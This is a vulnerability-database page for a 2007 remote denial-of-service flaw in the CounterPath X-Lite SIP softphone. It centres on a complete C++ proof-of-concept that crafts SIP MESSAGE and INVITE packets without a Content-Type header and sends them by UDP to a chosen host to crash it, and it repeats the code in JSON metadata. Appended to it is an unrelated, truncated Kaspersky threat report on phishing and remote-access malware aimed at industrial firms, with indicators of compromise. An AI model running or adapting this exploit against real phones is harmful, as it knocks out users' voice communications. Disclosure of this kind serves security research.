Search...

CounterPath X-Lite SIP phone Remote Denial of Service vulnerability

2007-08-14T00:00:00

ID SECURITYVULNS:DOC:17782
Type securityvulns
Reporter Securityvulns
Modified 2007-08-14T00:00:00

Description

Title

Date

10 August 2007

Affected Software

X-Lite versions 3.x (tested on 3.0 34025) Maybe eyeBeam also ;)

Overview

X-Lite by CounterPath Solutions, Inc. is a free and wild used SIP based softphone. More information about X-Lite

can be found here: www.counterpath.com A message validation check flaw in X-Lite SIP phone implementation may allow a remote attacker to crash the phone

causing denial of service.

Vulnerability Description

The vulnerability occurs as a result of how the SIP client component handles an incorrectly sip packet. Method of

INVITE or MESSAGE will be ok. MESSAGE is a sip method for Instant Messaging. After X-Lite receive a malformed packet without "Content-Type" field, we call "Missing Content-Type Vulnerability",

it will be crash.

Solution

Not really.

Credit

This vulnerability was discovered by Zwell. http://www.nosec.org

PoC

/*main.cpp**/

include <stdio.h>

include <string>

using namespace std;

ifdef WIN32

include <winsock2.h>

pragma comment(lib, "ws2_32.lib")

define close closesocket

define write(a,b,c) send(a, b, c, 0)

define writeto(a,b,c,d,e) sendto(a, b, c, 0, d, e)

define read(a,b,c) recv(a, b, c, 0)

define readfrom(a,b,c,d,e) recvfrom(a, b, c, 0, d, e)

else

include <sys/socket.h>

include <netinet/in.h>

include <netinet/tcp.h>

include <netdb.h>

include <arpa/inet.h>

define closesocket close

define SOCKET int

define DWORD unsigned long

endif

char *craft_pkt[] = { "MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n" "Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n" "From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n" "To: <sip:[TOADDR]>\r\n" "Call-ID: [CALLID]@[DOMAIN]\r\n" "CSeq: [CSEQ] MESSAGE\r\n" "Contact: <sip:[FROMUSER]@[DOMAIN]:[LOCALPORT]>\r\n" "Content-Length: 0\r\n\r\n",

    &quot;INVITE sip:[FROMUSER]@[DOMAIN] SIP/2.0&#92;r&#92;n&quot;
    &quot;Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]&#92;r&#92;n&quot;
    &quot;To: &lt;sip:[TOADDR]&gt;&#92;r&#92;n&quot;
    &quot;From: [FROMUSER] &lt;sip:[FROMADDR]:[LOCALPORT]&gt;;tag=[TAG]&#92;r&#92;n&quot;
    &quot;Call-ID: [CALLID]@[DOMAIN]&#92;r&#92;n&quot;
    &quot;CSeq: [CSEQ] INVITE&#92;r&#92;n&quot;
    &quot;Contact: &lt;sip:[FROMUSER]@[DOMAIN]:[LOCALPORT]&gt;&#92;r&#92;n&quot;
    &quot;Content-Length: 0&#92;r&#92;n&#92;r&#92;n&quot;,

};

void socket_init() {

ifdef WIN32

    WSADATA wsaData;
    WSAStartup&#40;MAKEWORD&#40;2,0&#41;, &amp;wsaData&#41;;

endif

}

unsigned long resolv(const char host) { struct hostent hp; unsigned long host_ip;

    host_ip = inet_addr&#40;host&#41;;
    if&#40; host_ip == INADDR_NONE &#41;
    {
            hp = gethostbyname&#40;host&#41;;
            if&#40;!hp&#41;
            {
                    printf&#40;&quot;&#92;nError: Unable to resolve hostname &#40;&#37;s&#41;&#92;n&quot;,host&#41;;
                    exit&#40;1&#41;;
            }
            else
                    host_ip = *&#40;u_long*&#41;hp-&gt;h_addr ;
    }

    return&#40;host_ip&#41;;

}

SOCKET udpsocket() { / network / SOCKET sockfd; struct sockaddr_in laddr, raddr;

    sockfd = socket&#40;AF_INET, SOCK_DGRAM, 0&#41;;
    if &#40;sockfd == -1&#41;
            goto error;

    memset&#40;&#40;char *&#41; &amp;laddr, 0, sizeof&#40;laddr&#41;&#41;;
    laddr.sin_family = AF_INET;
    laddr.sin_addr.s_addr = htonl&#40;INADDR_ANY&#41;;
    if &#40;bind&#40;sockfd, &#40;struct sockaddr *&#41; &amp;laddr, sizeof&#40;laddr&#41;&#41; == -1&#41;
            goto error;

    return sockfd;

error:

ifdef WIN32

    printf&#40;&quot;Error:&#37;d&#92;n&quot;, GetLastError&#40;&#41;&#41;;

endif

    return 0;

}

string &replace_all(string &str,const string& old_value,const string& new_value)
{
while(true)
{
string::size_type pos(0);
if( (pos=str.find(old_value))!=string::npos)
str.replace(pos,old_value.length(),new_value);
else break;
}
return str;
}

string &replace_with_rand(string &str, char value, int len) { char strspace = "0123456789"; char randstr[100]; for(int i=0; i<len; i++) { do { randstr[i] = strspace[rand()%strlen(strspace)]; }while(randstr[i] == '0'); } randstr[len] = 0; replace_all(str, value, randstr); return str; }

string build_packet(string _packet, char addr, char host) { string packet = _packet; replace_all(packet, "[FROMADDR]", addr); replace_all(packet, "[TOADDR]", host); replace_all(packet, "[DOMAIN]", "www.nosec.org"); replace_all(packet, "[FROMUSER]", "siprint"); replace_with_rand(packet, "[CSEQ]", 9); replace_with_rand(packet, "[CALLID]", 9); replace_with_rand(packet, "[TAG]", 9); replace_with_rand(packet, "[BRANCH]", 9); return packet; }

int main(int argc, char argv) { char host; int port; char localip; struct sockaddr_in sockaddr; struct sockaddr_in raddr; int sockaddrlen = sizeof(sockaddr); SOCKET s;

    printf&#40;&quot;X-Lite Missing Content-Type DOS PoC&#92;n&quot;&#41;;

    if&#40;argc != 4&#41;
    {
            printf&#40;&quot;usage : &#37;s &lt;host&gt; &lt;port&gt; &lt;localip&gt;&#92;n&quot;, argv[0]&#41;;
            exit&#40;-1&#41;;
    }

    host = argv[1];
    port = atoi&#40;argv[2]&#41;;
    localip = argv[3];

    socket_init&#40;&#41;;
    s = udpsocket&#40;&#41;;
    if&#40;s == 0&#41;
    {
            printf&#40;&quot;Create udp socket error!&#92;n&quot;, host, port&#41;;
            return 1;
    }
    memset&#40;&amp;sockaddr, 0, sockaddrlen&#41;;
    getsockname&#40;s, &#40;struct sockaddr *&#41; &amp;sockaddr, &#40;int *&#41; &amp;sockaddrlen&#41;;

    raddr.sin_family = AF_INET;
    raddr.sin_addr.S_un.S_addr = resolv&#40;host&#41;;
    raddr.sin_port = htons&#40;port&#41;;
    for&#40;int i=0; i&lt;20; i++&#41;
    {
            char portstr[6] = {&#39;&#92;0&#39;};
            string packet = build_packet&#40;craft_pkt[i&#37;2], localip, host&#41;;
            sprintf&#40;portstr, &quot;&#37;d&quot;, ntohs&#40;sockaddr.sin_port&#41;&#41;;
            replace_all&#40;packet, &quot;[LOCALPORT]&quot;, portstr&#41;;
            //printf&#40;&quot;===========&#92;n&#37;s&#92;n===========&#92;n&quot;, packet.c_str&#40;&#41;&#41;;
            writeto&#40;s, packet.c_str&#40;&#41;, packet.length&#40;&#41;, &#40;struct sockaddr*&#41;&amp;raddr, sockaddrlen&#41;;
            Sleep&#40;100&#41;;
    }

    return 0;

}

JSON Vulners Source

Initial Source

{"id": "SECURITYVULNS:DOC:17782", "bulletinFamily": "software", "title": "CounterPath X-Lite SIP phone Remote Denial of Service vulnerability", "description": "Title\r\n=====\r\nCounterPath X-Lite SIP phone Remote Denial of Service vulnerability\r\n\r\nDate\r\n====\r\n10 August 2007\r\n\r\nAffected Software\r\n=================\r\nX-Lite versions 3.x (tested on 3.0 34025)\r\nMaybe eyeBeam also ;)\r\n\r\nOverview\r\n========\r\nX-Lite by CounterPath Solutions, Inc. is a free and wild used SIP based softphone. More information about X-Lite \r\n\r\ncan be found here: www.counterpath.com\r\nA message validation check flaw in X-Lite SIP phone implementation may allow a remote attacker to crash the phone \r\n\r\ncausing denial of service. \r\n\r\nVulnerability Description\r\n=====================\r\nThe vulnerability occurs as a result of how the SIP client component handles an incorrectly sip packet. Method of \r\n\r\nINVITE or MESSAGE will be ok. MESSAGE is a sip method for Instant Messaging. \r\nAfter X-Lite receive a malformed packet without "Content-Type" field, we call "Missing Content-Type Vulnerability", \r\n\r\nit will be crash.\r\n\r\nSolution\r\n========\r\nNot really.\r\n\r\nCredit\r\n======\r\nThis vulnerability was discovered by Zwell. http://www.nosec.org\r\n\r\nPoC\r\n===\r\n/**********main.cpp***********/\r\n#include <stdio.h>\r\n#include <string>\r\nusing namespace std; \r\n\r\n#ifdef WIN32\r\n#include <winsock2.h>\r\n#pragma comment(lib, "ws2_32.lib")\r\n#define close closesocket\r\n#define write(a,b,c) send(a, b, c, 0)\r\n#define writeto(a,b,c,d,e) sendto(a, b, c, 0, d, e)\r\n#define read(a,b,c) recv(a, b, c, 0)\r\n#define readfrom(a,b,c,d,e) recvfrom(a, b, c, 0, d, e)\r\n#else\r\n#include <sys/socket.h>\r\n#include <netinet/in.h>\r\n#include <netinet/tcp.h>\r\n#include <netdb.h>\r\n#include <arpa/inet.h>\r\n#define closesocket close\r\n#define SOCKET int\r\n#define DWORD unsigned long\r\n#endif\r\n\r\nchar *craft_pkt[] =\r\n{\r\n "MESSAGE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"\r\n "Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"\r\n "From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"\r\n "To: <sip:[TOADDR]>\r\n"\r\n "Call-ID: [CALLID]@[DOMAIN]\r\n"\r\n "CSeq: [CSEQ] MESSAGE\r\n"\r\n "Contact: <sip:[FROMUSER]@[DOMAIN]:[LOCALPORT]>\r\n"\r\n "Content-Length: 0\r\n\r\n",\r\n\r\n "INVITE sip:[FROMUSER]@[DOMAIN] SIP/2.0\r\n"\r\n "Via: SIP/2.0/UDP [FROMADDR]:[LOCALPORT];branch=[BRANCH]\r\n"\r\n "To: <sip:[TOADDR]>\r\n"\r\n "From: [FROMUSER] <sip:[FROMADDR]:[LOCALPORT]>;tag=[TAG]\r\n"\r\n "Call-ID: [CALLID]@[DOMAIN]\r\n"\r\n "CSeq: [CSEQ] INVITE\r\n"\r\n "Contact: <sip:[FROMUSER]@[DOMAIN]:[LOCALPORT]>\r\n"\r\n "Content-Length: 0\r\n\r\n",\r\n};\r\n\r\nvoid socket_init()\r\n{\r\n#ifdef WIN32\r\n WSADATA wsaData;\r\n WSAStartup(MAKEWORD(2,0), &wsaData);\r\n#endif\r\n}\r\n\r\nunsigned long resolv(const char *host)\r\n{\r\n struct hostent *hp;\r\n unsigned long host_ip;\r\n\r\n host_ip = inet_addr(host);\r\n if( host_ip == INADDR_NONE )\r\n {\r\n hp = gethostbyname(host);\r\n if(!hp)\r\n {\r\n printf("\nError: Unable to resolve hostname (%s)\n",host);\r\n exit(1);\r\n }\r\n else\r\n host_ip = *(u_long*)hp->h_addr ;\r\n }\r\n\r\n return(host_ip);\r\n}\r\n\r\nSOCKET udpsocket() \r\n{\r\n /* network */\r\n SOCKET sockfd;\r\n struct sockaddr_in laddr, raddr;\r\n\r\n sockfd = socket(AF_INET, SOCK_DGRAM, 0);\r\n if (sockfd == -1)\r\n goto error;\r\n\r\n memset((char *) &laddr, 0, sizeof(laddr));\r\n laddr.sin_family = AF_INET;\r\n laddr.sin_addr.s_addr = htonl(INADDR_ANY);\r\n if (bind(sockfd, (struct sockaddr *) &laddr, sizeof(laddr)) == -1)\r\n goto error;\r\n\r\n return sockfd;\r\n\r\nerror:\r\n#ifdef WIN32\r\n printf("Error:%d\n", GetLastError());\r\n#endif\r\n return 0;\r\n}\r\n\r\n\r\nstring &replace_all(string &str,const string& old_value,const string& new_value) \r\n{ \r\n while(true) \r\n { \r\n string::size_type pos(0); \r\n if( (pos=str.find(old_value))!=string::npos) \r\n str.replace(pos,old_value.length(),new_value); \r\n else break; \r\n } \r\n return str; \r\n} \r\n\r\nstring &replace_with_rand(string &str, char *value, int len)\r\n{\r\n char *strspace = "0123456789";\r\n char randstr[100];\r\n for(int i=0; i<len; i++)\r\n {\r\n do\r\n {\r\n randstr[i] = strspace[rand()%strlen(strspace)];\r\n }while(randstr[i] == '0');\r\n }\r\n randstr[len] = 0;\r\n replace_all(str, value, randstr);\r\n return str;\r\n}\r\n\r\nstring build_packet(string _packet, char *addr, char *host)\r\n{\r\n string packet = _packet;\r\n replace_all(packet, "[FROMADDR]", addr);\r\n replace_all(packet, "[TOADDR]", host);\r\n replace_all(packet, "[DOMAIN]", "www.nosec.org");\r\n replace_all(packet, "[FROMUSER]", "siprint");\r\n replace_with_rand(packet, "[CSEQ]", 9);\r\n replace_with_rand(packet, "[CALLID]", 9);\r\n replace_with_rand(packet, "[TAG]", 9);\r\n replace_with_rand(packet, "[BRANCH]", 9);\r\n return packet;\r\n}\r\n\r\nint main(int argc, char **argv)\r\n{\r\n char *host;\r\n int port;\r\n char *localip;\r\n struct sockaddr_in sockaddr;\r\n struct sockaddr_in raddr;\r\n int sockaddrlen = sizeof(sockaddr);\r\n SOCKET s;\r\n\r\n printf("X-Lite Missing Content-Type DOS PoC\n");\r\n\r\n if(argc != 4)\r\n {\r\n printf("usage : %s <host> <port> <localip>\n", argv[0]);\r\n exit(-1);\r\n }\r\n\r\n host = argv[1];\r\n port = atoi(argv[2]);\r\n localip = argv[3];\r\n\r\n socket_init();\r\n s = udpsocket();\r\n if(s == 0)\r\n {\r\n printf("Create udp socket error!\n", host, port);\r\n return 1;\r\n }\r\n memset(&sockaddr, 0, sockaddrlen);\r\n getsockname(s, (struct sockaddr *) &sockaddr, (int *) &sockaddrlen);\r\n \r\n raddr.sin_family = AF_INET;\r\n raddr.sin_addr.S_un.S_addr = resolv(host);\r\n raddr.sin_port = htons(port);\r\n for(int i=0; i<20; i++)\r\n {\r\n char portstr[6] = {'\0'};\r\n string packet = build_packet(craft_pkt[i%2], localip, host);\r\n sprintf(portstr, "%d", ntohs(sockaddr.sin_port));\r\n replace_all(packet, "[LOCALPORT]", portstr);\r\n //printf("===========\n%s\n===========\n", packet.c_str());\r\n writeto(s, packet.c_str(), packet.length(), (struct sockaddr*)&raddr, sockaddrlen);\r\n Sleep(100);\r\n }\r\n\r\n return 0;\r\n}", "published": "2007-08-14T00:00:00", "modified": "2007-08-14T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:17782", "reporter": "Securityvulns", "references": [], "cvelist": [], "type": "securityvulns", "lastseen": "2018-08-31T11:10:23", "edition": 1, "viewCount": 1, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2018-08-31T11:10:23", "rev": 2}, "dependencies": {"references": [{"type": "mskb", "idList": ["KB2526297", "KB2501721", "KB317244", "KB980408", "KB981401", "KB2785908", "KB953331", "KB2510690", "KB3191913", "KB2874216"]}], "modified": "2018-08-31T11:10:23", "rev": 2}, "vulnersScore": 0.2}, "affectedSoftware": []}

{"securelist": [{"lastseen": "2020-11-06T10:16:41", "bulletinFamily": "blog", "cvelist": [], "description": "![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/12/07085943/abstract-secure-990x400.jpeg)\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2019/04/16152111/pdf_icon_new.jpg) Download full report (PDF)](<https://ics-cert.kaspersky.com/media/Kaspersky-Attacks-on-industrial-enterprises-using-RMS-and-TeamViewer-EN.pdf>)\n\n## Executive Summary\n\nIn summer 2019, Kaspersky ICS CERT identified a new wave of phishing emails containing various malicious attachments. The emails target companies and organizations from different sectors of the economy that are associated with industrial production in one way or another.\n\nWe reported these attacks in 2018 in an article entitled "[Attacks on industrial enterprises using RMS and TeamViewer](<https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/>)", but recent data shows that the attackers have modified their attack techniques and that the number of enterprises facing the threat of infection is growing.\n\nBefore publishing this report, we waited for the vendor of the RMS software to make changes to its services to ensure that the results of this research could not be used to exploit vulnerabilities.\n\n**This report in a nutshell:**\n\n * From 2018 to at least the early fall of 2020, attackers sent phishing emails laced with malware.\n * The attacks make use of social engineering techniques and legitimate documents, such as memos and documents detailing equipment settings or other industrial process information, which have apparently been stolen from the company under attack or its business partners.\n * The attacks still use remote administration utilities. The graphical user interface of these utilities is hidden by the malware, enabling the attackers to control infected systems without their users' knowledge.\n * In the new version of the malware, the attackers changed the notification channel used after infecting a new system: instead of malware command-and-control servers, they use the web interface of the RMS remote administration utility's cloud infrastructure.\n * Stealing money from the organization under attack remains the main objective of the attackers.\n * During an ongoing attack, the cybercriminals use spyware and the Mimikatz utility to steal authentication credentials that are subsequently used to infect other systems on the enterprise network.\n\n**The full article is available on [Kaspersky Threat Intelligence](<https://www.kaspersky.com/enterprise-security/threat-intelligence>).**\n\n**For more information please contact: [ics-cert@kaspersky.com](<mailto:ics-cert@kaspersky.com>).**\n\n## Technical Analysis\n\nSince we described the technical details of this series of attacks in our previous report, [Attacks on industrial enterprises using RMS and TeamViewer](<https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/>), in this document we only list the main stages of an attack and describe the changes to the attackers' tactics and toolset that have been implemented since the publication of the previous report.\n\n### Spreading\n\nPhishing emails used in this attack are in most cases disguised as business correspondence between organizations. Specifically, the attackers send claim letters on behalf of a large industrial company.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02143900/sl_-Industrial-attacks_01.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02143900/sl_-Industrial-attacks_01.png>)\n\n_**Phishing email disguised as a claim letter**_\n\nIn the earlier attack series, the attackers used a sender email address with a domain name that was similar to the official website address of the organization on whose behalf their phishing emails were sent. Now they use public email services to send their phishing emails and they use a different technique to mislead message recipients and persuade them to open a malicious attachment: they pretend to be a real business partner or to represent a real subsidiary of the company under attack and ask the recipient to view the documents attached by the deadline specified in the email, explaining the request by the approaching end of a purchase tender, possible penalties or the need to review equipment configuration data as soon as possible.\n\nIt should also be emphasized that the phishing emails are individually crafted for each specific company that is attacked. This is demonstrated by the fact that the name of the company under attack is mentioned in the email text, as well as by the documents used by the attackers as attachments (descriptions of the documents are provided below). In some of the cases identified earlier, the attackers also addressed the recipient by his or her full name.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02143932/sl_-Industrial-attacks_02.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02143932/sl_-Industrial-attacks_02.png>)\n\n_**Phishing email sent on behalf of a contractor**_\n\nAttachments used in phishing emails are password-protected archives, with the password provided in the message body. The attackers explain this method of sending information by referring to confidentiality considerations in the message body, but in reality password protection prevents files stored in the archive from being scanned with antivirus tools.\n\n### Malware Features\n\nThe archive attached to a phishing email contains several malicious obfuscated JS scripts that have an identical functionality but slightly different structure due to different code obfuscation techniques being used. The script names are usually disguised as document names.\n\nIf a user runs one of these scripts, two files are unpacked and opened: a malicious program detected as HEUR:Backdoor.Win32.Generic, and a legitimate PDF file. Some JS script variants found in phishing emails download these files from a remote server rather than extracting them from the script's body.\n\nIn earlier attacks, to ensure that the user didn't have questions regarding the absence of the documents mentioned in the message body and to distract the user while installing the malware, the attackers opened a damaged PDF document or image or launched a legitimate software installer.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144003/sl_-Industrial-attacks_03.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144003/sl_-Industrial-attacks_03.png>)\n\n_**Image opened by the malware in earlier attacks**_\n\nIn their later attacks, the threat actor began to use actual documents related to the attacked organization's area of work. A document can look like one created by a business partner or even the attacked organization itself. Specifically, documents used in attacks include scan copies of memos, letters to subsidiaries and contractors, as well as procurement documentation forms that were apparently stolen earlier.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144029/sl_-Industrial-attacks_04.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144029/sl_-Industrial-attacks_04.png>)\n\n_**PDF document containing instructions for subsidiaries, used by the attackers**_\n\nA fact of particular interest is that in some cases, the attackers used documents containing industrial equipment configuration data and other information related to the industrial process.\n\nSpecifically, screenshots from the DIGSI application have been used. The application is designed to configure relay systems manufactured by Siemens.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144057/sl_-Industrial-attacks_05.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144057/sl_-Industrial-attacks_05.png>)\n\n_**DIGSI software screenshot 1**_\n\nDIGSI is used by electric power facilities, such as substations, to configure their relay protection systems.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144121/sl_-Industrial-attacks_06.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144121/sl_-Industrial-attacks_06.png>)\n\n_**DIGSI software screenshot 2**_\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144155/sl_-Industrial-attacks_07.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144155/sl_-Industrial-attacks_07.png>)\n\n_**Screenshot of a relay system's configuration matrix. List of setpoints**_\n\nWe also found screenshots with transformer oscillograms in documents used by the attackers:\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144222/sl_-Industrial-attacks_08.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144222/sl_-Industrial-attacks_08.png>)\n\n_**Vector diagrams with oscillograms**_\n\nIt is worth noting that the last screenshot shows oscillograms for a system at the moment of an accident.\n\nPhishing emails with such screenshots do not call for the settings shown in attached documents to be implemented. It is most likely that the attackers use documents with the above screenshots to distract the personnel while the malware is being installed. Since the data mentioned above can provide a relay protection expert with information on standard settings used at the facility, the fact that the attackers have such screenshots at their disposal is cause for concern.\n\nThe JS script then launches the malware, which installs a version of TeamViewer, a remote administration tool (RAT), modified by the attackers. As in earlier attacks, the attackers use a malicious DLL library to hide the graphical user interface in order to control the infected system without the user's knowledge.\n\nIf additional information needs to be collected, the attackers download an additional set of malware selected specifically for each victim. This can be spyware designed to collect credentials for a variety of programs and services, including email clients, browsers, SSH/FTP/Telnet clients, as well as recording keypresses and making screenshots. In some cases, the Mimikatz utility is used to collect account credentials for Windows accounts entered on the compromised system. The use of Mimikatz poses a particular danger, because it can provide the attackers with access to a large number of systems on the enterprise's network.\n\nIn most cases, the attackers disguise malware components as Windows components to hide traces of malicious activity on the system.\n\n### Infrastructure\n\nWhile analyzing the new series of attacks, we noticed two ways in which the infrastructure is organized differently from that used in earlier attacks.\n\nFirst, the attackers use resources disguised as websites of existing Russian-speaking companies to store files downloaded by malicious JS scripts at the system infection stage.\n\nThe second and more important difference is that the attackers no longer use a malware command-and-control server in their communication with infected systems.\n\nThe main reason for having a malware command-and-control server in this type of attack was the need to get the infected machine's ID in the TeamViewer system. The attackers already had any other information they needed (the password required to connect was provided in a special configuration file). In the new series of attacks, the attackers sent the infected machine's TeamViewer ID using the legitimate infrastructure of the RMS remote administration system.\n\nThis was possible because the RMS remote administration infrastructure has a dedicated web service designed to notify the administrator that an RMS distribution package has been installed on a remote system. To send the notification, the RMS server generates an email message that contains the machine's ID in the RMS system in the message body. For the message to be generated, it is sufficient for the RMS client to send an HTTP POST request to the dedicated web page, providing the following data: product name, ID of the language pack used in the system, user name, computer name, email address to which the notification should be delivered, and the machine's ID in the RMS system assigned after installing the program.\n\n[![](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144314/sl_-Industrial-attacks_09.png)](<https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2020/11/02144314/sl_-Industrial-attacks_09.png>)\n\n_**Attack kill chain**_\n\nThe underlying mechanism of the web service contained a vulnerability: it did not use any kind of authorization procedure. The malicious DLL responsible for hiding the TeamViewer graphic interface included code for sending the request described above to the RMS server. However, it sent the machine's ID in the TeamViewer system instead of its ID in the RMS system. The ID length in the TeamViewer system is different from the ID length in the RMS system; however, since there is no verification of the contents of fields sent to the server in the HTTP POST request, a notification message with information on a newly infected machine was successfully delivered to the attacker's address.\n\nKaspersky ICS CERT has notified RMS developers that their infrastructure is being used for criminal purposes, providing them with all the technical details needed to close the vulnerability. To date, the vulnerability has not been closed by the developers, but a workaround, filtration based on an address whitelist, has been implemented.\n\nIn other words, the functionality still works, but notification emails are only sent to email addresses included in a special list of customers 'verified' by RMS developers.\n\n**For technical details about this vulnerability please contact: [ics-cert@kaspersky.com](<mailto:ics-cert@kaspersky.com>)**\n\n## Victims\n\nAs mentioned above, the vast majority of attacked systems are industrial enterprises in Russia representing various sectors of the economy. We identified attacks on companies from the following industries:\n\n * Manufacturing\n * Oil and gas\n * Metal industry\n * Engineering\n * Energy\n * Construction\n * Mining\n * Logistics\n\nConsequently, this is not a case of an attack narrowly targeting one specific industry; however, since most legitimate documents used in the attacks are from the energy sector, it can be assumed that the attackers have a particular interest in the sector.\n\n## Attribution\n\nWe are convinced that a Russian-speaking group is behind these attacks.\n\nThe main arguments in favor of this theory were offered in our previous report, "[Attacks on industrial enterprises using RMS and TeamViewer](<https://securelist.com/attacks-on-industrial-enterprises-using-rms-and-teamviewer/87104/>)".\n\nNote also that the code used to send requests to the RMS server, which was identified in the process of analyzing the new version of the malicious DLL, contains a language ID for the Russian localization of the operating system.\n\nAccording to available information, the main objective of the criminals is to steal money from victim organizations' accounts. This means that the attackers must have a good understanding of the financial workflow, which differs in some of its aspects from country to country, and support the appropriate infrastructure for cash withdrawal.\n\nThe group does not use any sophisticated tactics or technologies, but it carefully prepares each attack and expertly uses social engineering techniques, as well as technologies that are already known from attacks staged by other criminal groups.\n\nWe believe that the group includes people responsible for the technical aspect of infecting victims' systems, as well as people responsible for financial operations, i.e., for stealing money from the group's victims.\n\n## Conclusions\n\nThe threat actor continues to attack industrial enterprises successfully using relatively simple techniques, but its methods are evolving. To persuade users of the legitimacy of phishing emails, criminals have begun to use documents that were apparently stolen during earlier attacks. It is worth noting that some of the documents used for this purpose contain information on industrial equipment settings and industrial process parameters. This is one more reason to believe that these attacks specifically target industrial enterprises.\n\nThe main technical change in the attacks is that the attackers have discarded the most vulnerable stage in data collection and transmission \u2013 that is, malware command-and-control servers, which can be disconnected by the hosting provider or blocked by information security systems. Instead, new system infection notifications are delivered via the legitimate web interface of the RMS remote administration utility's cloud infrastructure. Resources disguised as legitimate websites of existing organizations are used to store malware samples.\n\nThe attackers have full control of an infected system from the moment it becomes infected. Stealing money from the organization's accounts remains their main objective. When the attackers connect to a victim's computer, they look for financial and accounting software (1C accounting software, bank-client, etc.). In addition, they find and analyze procurement-related accounting documents and peruse the email correspondence of the enterprise's employees. After that, the attackers look for various ways in which they can commit financial fraud. We believe that the criminals are able to substitute the bank details used to pay invoices.\n\nClearly, the attackers' remote access to infected systems also poses other threats, such as the organization's sensitive data being leaked, systems being put out of operation, etc. As the latest events have shown, the attackers use documents that were probably stolen from organizations to carry out subsequent attacks, including attacks on victim companies' partners.\n\nIf you have encountered an attack of this kind, you can report it to us through a [form](<https://ics-cert.kaspersky.com/contacts/>) on our website.\n\n## Recommendations\n\n * Train employees at enterprises in using email securely and, specifically, in identifying phishing messages\n * Restrict the ability of programs to gain SeDebugPrivilege privileges (wherever possible)\n * Install antivirus software with support for centrally managing the security policy on all systems; keep the antivirus databases and program modules of security solutions up to date\n * Use accounts with domain administrator privileges only when necessary. After using such accounts, restart the system on which the authentication was performed\n * Implement a password policy with password strength and regular password change requirements\n * If it is suspected that some systems are infected: remove all third-party remote administration utilities, scan these systems with antivirus software and force a change of passwords for all accounts that have been used to log on to compromised systems\n * Monitor network connections for any traces of remote administration utilities installed without proper authorization. Make a special emphasis on the use of RMS and TeamViewer utilities\n * Use network activity filtration systems to block connections to servers and IP addresses listed in Appendix I \u2013 Indicators of Compromise\n * Never use obsolete versions of the TeamViewer utility (versions 6.0 and earlier). To discover any instances of obsolete versions of TeamViewer being used, the YARA rule provided in Appendix I \u2013 Indicators of Compromise can be used\n * It should be noted that, since the attack uses legitimate remote administration software, that software can remain on the victim's computer and continue operating even when the malicious downloader has been removed. If remote administration software has been identified at the stage of scanning corporate systems, it should be determined in each case whether it was installed legitimately\n\n**For more information please contact: [ics-cert@kaspersky.com](<mailto:ics-cert@kaspersky.com>)**\n\n## Appendix I \u2013 Indicators of Compromise\n\n**File Hashes (malicious documents, malware, emails etc.)**\n\n * 386a1594a0add346b8fbbebcf1547e77\n * 203e341cf850d7a05e44fafc628aeaf1\n * 3b79aacdc33593e8c8f560e4ab1c02c6\n * ea1440202beb02cbb49b5bef1ec013c0\n * 1091941264757dc7e3da0a086f69e4bb\n * 72f206e3a281248a3d5ca0b2c5208f5f\n * da4dff233ffbac362fee3ae08c4efa53\n * d768a65335e6ca715ab5ceb487f6862f\n * 9219e22809a1dff78aac5fff7c80933c\n * 86e14db0bcf5654a01c1b000d75b0324\n\n**File Names**\n\n * \u0410\u043a\u0442.js\n * \u0417\u0430\u043f\u0440\u043e\u0441 17782-09-1.js\n * \u041f\u0435\u0440\u0435\u0447\u0435\u043d\u044c \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u043e\u0432.js\n * \u0441\u043f\u0435\u0446\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u044f \u043d\u0430 \u043e\u0431\u043e\u0440\u0443\u0434\u043e\u0432\u0430\u043d\u0438\u0435 xls.js\n * tv.dll\n * tv.ini\n\nSome malware modules installed on the system have randomly generated names that follow a specific format. The following regular expression can be used to search for such files:\n\n%TEMP%\\\\\\\\[a-z]{2,3}[0-9]{2}.exe\n\nThese files are saved in the temporary file directory (%TEMP%); the first part of the file name consists of two or three Roman characters; the second is a two-digit number followed by the extension .exe\n\n**Domains and IPs**\n\n * timkasprot.temp.swtest[.]ru (RemoteAdmin.Win32.RemoteManipulator.vpj)\n * 77.222.56[.]169 (RemoteAdmin.Win32.RemoteManipulator.vpj)\n * z-wavehome[.]ru (RemoteAdmin.Win32.RemoteManipulator.vpj)\n * 